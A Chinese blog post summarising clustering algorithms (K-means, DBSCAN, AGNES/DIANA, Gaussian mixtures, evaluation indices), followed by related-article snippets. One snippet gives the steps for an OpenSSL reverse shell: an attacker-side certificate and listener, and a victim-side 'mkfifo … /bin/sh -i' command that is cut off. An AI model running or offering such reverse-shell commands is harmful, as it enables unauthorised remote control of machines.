机器学习-无监督学习之聚类

文章目录

  • K均值聚类
  • 密度聚类(DBSCAN)
  • 层次聚类
    • AGNES 算法
    • DIANA算法
  • 高斯混合模型聚类
  • 聚类效果的衡量指标
  • 小结

K均值聚类

  • 步骤:
    Step1:随机选取样本作为初始均值向量。
    Step2:计算样本点到各均值向量的距离,距离哪个最近就属于哪个簇
    Step3:重新计算中心点作为均值向量,重复第二步直到收敛
  • 常见距离
    • 曼哈顿距离(街区距离)
    • 欧氏距离
    • 切比雪夫距离(棋盘距离)
    • 闵氏距离(结合前三种)
    • 余弦相似度
      • 适用场景:塔吊和文本分析
    • 汉明距离
      • 适用场景:计算机网络中二进制纠错
  • 没有哪个距离最好,只有哪个距离最合适,这就是理解这么多距离的原因

密度聚类(DBSCAN)

  1. 概念:
  • 给定数据集D={x1,x2,…,xm}
  • 邻域ε:对x∈D,其ε邻域包含样本集D中与x的距离不大于ε的样本
  • 核心对象:若x的ε邻域至少包含MinPts个样本,即|N(x)|≥MinPts,则x是一个核心对象。
    N ( x ) = { x ′ ∈ D ∣ dist ( x , x ′ ) ≤ ε } N(x) = \{x' \in D \mid \text{dist}(x, x') \leq \varepsilon\} N(x)={xDdist(x,x)ε}
  1. 密度直达、密度可达、密度相连

层次聚类

应用:生物领域

AGNES 算法

  • 思想类似归并排序,自底向上
    Step1:先将每个样本当成一个簇
    Step2:然后将距离最近的两个簇进行合并
    Step3:重复Step2
    直到,最远的两个簇的距离超过阈值或簇的个数达到指定值
  • 距离:最大距离、最小距离、平均距离

DIANA算法

  • 思想类似快速排序,自顶向下
    Step1:初始化,所有样本集中归为一个簇
    Step2:在同一个簇中,计算任意两个样本之间的距离,找到距离最远的两个样本点a,b,
    将a,b作为两个簇的中心:
    Step3:计算原来簇中剩余样本点距离a,b的距离,距离哪个中心近,分配到哪个簇中
    Step4:重复步骤2、3
    直到,最远两簇距离不足阈值,或者簇的个数达到指定值,终止算法

高斯混合模型聚类

  • 应用:将混合的连个数据集分开
  • 一维高斯函数,多元独立高斯函数
  • 正态分布就是高斯函数
    f ( x ) = 1 ( 2 π ) d / 2 ⋅ ∣ Σ ∣ 1 / 2 ⋅ exp ⁡ ( − 1 2 ( x − μ ) T Σ − 1 ( x − μ ) ) f(x) = \frac{1}{(2\pi)^{d/2} \cdot |\Sigma|^{1/2}} \cdot \exp\left(-\frac{1}{2}(x - \mu)^T \Sigma^{-1} (x - \mu)\right) f(x)=(2π)d/2∣Σ1/21exp(21(xμ)TΣ1(xμ))
  • 高斯混合模型:
    f ( x ) = ∑ i = 1 K w i ⋅ 1 ( 2 π ) d / 2 ⋅ ∣ Σ i ∣ 1 / 2 ⋅ exp ⁡ ( − 1 2 ( x − μ i ) T Σ i − 1 ( x − μ i ) ) f(x) = \sum_{i=1}^{K} w_i \cdot \frac{1}{(2\pi)^{d/2} \cdot |\Sigma_i|^{1/2}} \cdot \exp\left(-\frac{1}{2}(x - \mu_i)^T \Sigma_i^{-1} (x - \mu_i)\right) f(x)=i=1Kwi(2π)d/2Σi1/21exp(21(xμi)TΣi1(xμi))
    Step1:将参数随机初始化
    Step2:计算x_j由各混合成分生成的后验概率,即观测数据x_j由第i个分模型生成的概率p(z_j=i|x_j)并记为γ_ji
    Responsibility ( x i , θ ) = π k ⋅ N ( x i ∣ μ k , Σ k ) ∑ j = 1 K π j ⋅ N ( x i ∣ μ j , Σ j ) \text{Responsibility}(x_i, \theta) = \frac{\pi_k \cdot \mathcal{N}(x_i | \mu_k, \Sigma_k)}{\sum_{j=1}^{K} \pi_j \cdot \mathcal{N}(x_i | \mu_j, \Sigma_j)} Responsibility(xi,θ)=j=1KπjN(xiμj,Σj)πkN(xiμk,Σk)
    Step3:利用γ_ji计算新均值
    Step4:利用γ_ji计算新标准差
    Step5:利用γ_ji计算新权值
    Step6:重复Step2-5直到收敛
  • 最大似然函数思想

聚类效果的衡量指标

  • 目的:评估聚类结果是否好坏,确立优化目标
  • 结论:簇内彼此相似,簇间彼此不同
  • 指标(是否用到样本均值):
    • 外部指标:JC指数、FMI指数、RI指数
    • 内部指标:DB指数,Dunn指数

小结

  • 没有最优的算法,只有最合适的算法。

参考书:周志华-机器学习-西瓜书

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/106356.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

npm命令介绍

npm 描述:Node Package Manager (NPM) 是 Node.js 的包管理器,用于安装、管理和发布 JavaScript 包。示例:npm -v npm access 描述:控制包的访问权限。需要管理员或拥有特定权限的用户才能执行。示例:npm access pu…

【评分卡实现】应用Python中的toad.ScoreCard函数实现评分卡

逻辑回归已经在各大银行和公司都实际运用于业务。之前的文章已经阐述了逻辑回归三部曲——逻辑回归和sigmod函数的由来、

html设置前端加载动画

主体思路参考: 前端实现页面加载动画_边城仔的博客-CSDN博客 JS图片显示与隐藏案例_js控制图片显示隐藏-CSDN博客 1、编写load.css /* 显示加载场景 */ .loadBackGround{position: absolute;top: 0px;text-align: center;width: 100%;height: 100vh;background-c…

Qt QSS基本属性样式表半通关

文章目录 简介语法基本语法选择器通用选择器类选择器ID 选择器后代选择器子元素选择器属性选择器并集选择器两个特殊的选择器子控件选择器伪类选择器Qss 的特性层叠性继承性(Qt-Version >= 5.7)简介 为了书写方便, 文中一律使用 Qss 代替 Qt style sheet. 首先来看 Qt 的官…

C# Thread.Sleep(0)有什么用?

一、理论分析 回答这个要先从线程时间精度(时间片)开始说起。很多参考书说,默认情况下,时间片为15ms 左右,但是这是已经过时的知识。在老的 Windows 操作系统里,应用程序模式时时间片 15ms 左右&#xff0…

Kafka SASL认证授权(五)ACL源码解析

Kafka SASL认证授权(五)ACL源码解析。 官网地址:https://kafka.apache.org/ 一、ACL检查流程解析 一起看一下kafka server的启动与监听流程: Kafka -> KafkaServer -> SocketServer、KafkaRequestHandler 其中KafkaServer做相关的初始化,包括SocketServer 与 han…

CSS复习笔记

CSS 文章目录 CSS1.概念2.CSS 引入方式3.选择器基础选择器:标签选择器类选择器id 选择器通配符选择器 复合选择器:**后代选择器****子代选择器****并集选择器****交集选择器-了解****伪类选择器** 结构伪类选择器:**:nth-child(公式)**伪元素…

解决 android Cannot access ‘<init>‘: it is private in

最近要在2个非直接依赖module使用单例&#xff0c;有一种注入依赖的方式可以&#xff0c;但是报了如下错误&#xff1a; Cannot access <init>: it is private in 经过查阅资料&#xff0c;原来是依赖的单例类的构造函数不能使用private&#xff0c;这里做个记录&#…

kafka简述

前言 ​ 在大数据高并发场景下&#xff0c;当系统中出现“生产“和“消费“的速度或稳定性等因素不一致的时候&#xff0c;就需要消息队列&#xff0c;作为抽象层&#xff0c;弥合双方的差异。一般选型是Kafka、RocketMQ&#xff0c;这源于这些中间件的高吞吐、可扩展以及可靠…

使用OpenSSL的反弹shell

1、攻击机生成证书&#xff1a; openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes2、攻击机开启服务 openssl s_server -quiet -key key.pem -cert cert.pem -port 803、靶机连接命令 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1…

Leetcode 2902. Count of Sub-Multisets With Bounded Sum

Leetcode 2902. Count of Sub-Multisets With Bounded Sum 1. 解题思路2. 代码实现3. 算法优化 题目链接&#xff1a;2902. Count of Sub-Multisets With Bounded Sum 1. 解题思路 这一题有点惭愧&#xff0c;因为没有搞定&#xff0c;遇上了超时问题…… 我的思路其实还是…

《华为战略管理法:DSTE实战体系》作者谢宁老师受邀为某电力上市集团提供两天的《成功的产品管理及产品经理》内训。

​​ 近日&#xff0c;《华为战略管理法&#xff1a;DSTE实战体系》作者谢宁老师受邀为某电力上市集团提供两天的《成功的产品管理及产品经理》内训。 谢宁老师作为华为培训管理部特聘资深讲师和顾问&#xff0c;也是畅销书《华为战略管理法&#xff1a;DSTE实战体系》、《智慧…

Vue 项目中 style 样式中为什么要添加 scoped

1、作用 在 Vue 中使用 scoped 属性可以让样式作用域仅限于当前组件中&#xff0c;不影响全局&#xff0c;避免了样式污染和样式冲突的问题。 在组件中使用 scoped 的方式如下&#xff1a; <template><div class"example">Example Component</div…

在Linux中掌握不同的命令,让创建文件变得易如反掌

在Linux中创建一个新文件很简单,但也有一些令人惊讶和灵巧的技术。​在本教程中,学习如何从Linux终端创建文件。​ 先决条件 访问命令行/终端窗口(Ctrl-Alt-F2或Ctrl-Alt-T) 具有sudo权限的用户帐户(对于某些文件/目录是可选的) 从命令行创建新的Linux文件 Linux的设计…

React知识点系列(3)-每天10个小知识

目录 1. 请描述一下在 React 项目中如何使用 Webpack 进行模块打包和优化。2. 你如何理解 React 的函数组件和类组件之间的区别&#xff1f;在什么情况下会选择使用函数组件&#xff1f;3. 在 React 中&#xff0c;如何使用高阶函数来增强组件的功能&#xff1f;4. 请描述一下在…

Linux 系统安装 Redis7 —— 超详细操作演示!

内存数据库 Redis7 一、Redis 概述1.1 Redis 简介1.2 Redis 的用途1.3 Redis 特性1.4 Redis 的IO模型 二、Redis 的安装与配置2.1 Redis 的安装2.2 连接前的配置2.3 Redis 客户端分类2.4 Redis 配置文件详解 三、Redis 命令四、Redis 持久化五、Redis 主从集群六、Redis 分布式…

【Java 进阶篇】深入了解JavaScript中的函数

函数是JavaScript编程中的核心概念之一。它们是可重用的代码块&#xff0c;可以帮助您组织和管理程序&#xff0c;使您的代码更具可读性和可维护性。在本篇博客中&#xff0c;我们将深入了解JavaScript中的函数&#xff0c;包括函数的基本语法、参数、返回值、作用域、闭包和高…

手把手教你使用Python从零开始搭建感知器

大家好&#xff0c;今天本文将展示如何从零开始实现神经网络的最基本要素&#xff08;感知器&#xff09;&#xff0c;以及人工智能的基本模块背后的数学原理。 虽然人工智能和机器学习等术语已经成为流行词汇&#xff0c;每天都会听到或谈论这些概念&#xff0c;但它们背后的…

Linux信号 signal()编程

在Linux的进程间通信中可以用signal&#xff08;&#xff09;函数进行信号与信息传递。 1.信号 信号的名字和编号&#xff1a; 每个信号都有一个名字和编号&#xff0c;这些名字都以“SIG”开头&#xff0c;例如“SIGIO ”、“SIGCHLD”等等。 信号定义在signal.h头文件中&am…

网络基础2(1)

HTTP 1.应用层协议2.send和recv单独使用不安全3.URL4.urlencode和urldecode5.HTTP协议格式6.HTTP中的常见请求方法POST&&GET7.HTTP的状态码8.HTTP常见Header &#x1f31f;&#x1f31f;hello&#xff0c;各位读者大大们你们好呀&#x1f31f;&#x1f31f; &#x1f6…